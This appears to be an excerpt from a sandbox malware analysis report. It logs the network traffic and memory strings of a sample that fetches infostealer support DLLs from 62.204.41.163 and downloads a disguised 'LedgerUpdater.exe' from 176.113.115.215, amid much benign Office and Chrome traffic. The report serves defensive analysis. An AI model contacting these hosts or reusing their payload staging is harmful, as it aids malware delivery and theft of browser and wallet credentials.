Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=lwHAOL4AX1bg3z8&MD=LYNxXoCE HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.163Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1d1758bf3d6d1a39/sqlite3.dll HTTP/1.1Host: 62.204.41.163Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1d1758bf3d6d1a39/freebl3.dll HTTP/1.1Host: 62.204.41.163Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1d1758bf3d6d1a39/mozglue.dll HTTP/1.1Host: 62.204.41.163Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1d1758bf3d6d1a39/msvcp140.dll HTTP/1.1Host: 62.204.41.163Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1d1758bf3d6d1a39/nss3.dll HTTP/1.1Host: 62.204.41.163Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1d1758bf3d6d1a39/softokn3.dll HTTP/1.1Host: 62.204.41.163Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1d1758bf3d6d1a39/vcruntime140.dll HTTP/1.1Host: 62.204.41.163Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /LedgerUpdater.exe HTTP/1.1Host: 176.113.115.215Cache-Control: no-cache

Source: 40b7f229-ed3a-45bf-9f38-c8d76dce7740.tmp.10.dr	String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000003.1462485582.00001B4400F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1462554456.00001B44003A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000004.00000003.1462485582.00001B4400F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1462554456.00001B44003A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.1551434034.00001B44002C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com

Source: unknown

HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 913sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: DbMBWMxoNv.exe, 00000000.00000002.1925344849.0000000023406000.00000004.00000020.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1909388825.0000000002D59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.215/LedgerUpdater.exe
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://62.204.41.163
Source: DbMBWMxoNv.exe, 00000000.00000002.1909388825.0000000002D59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.163/
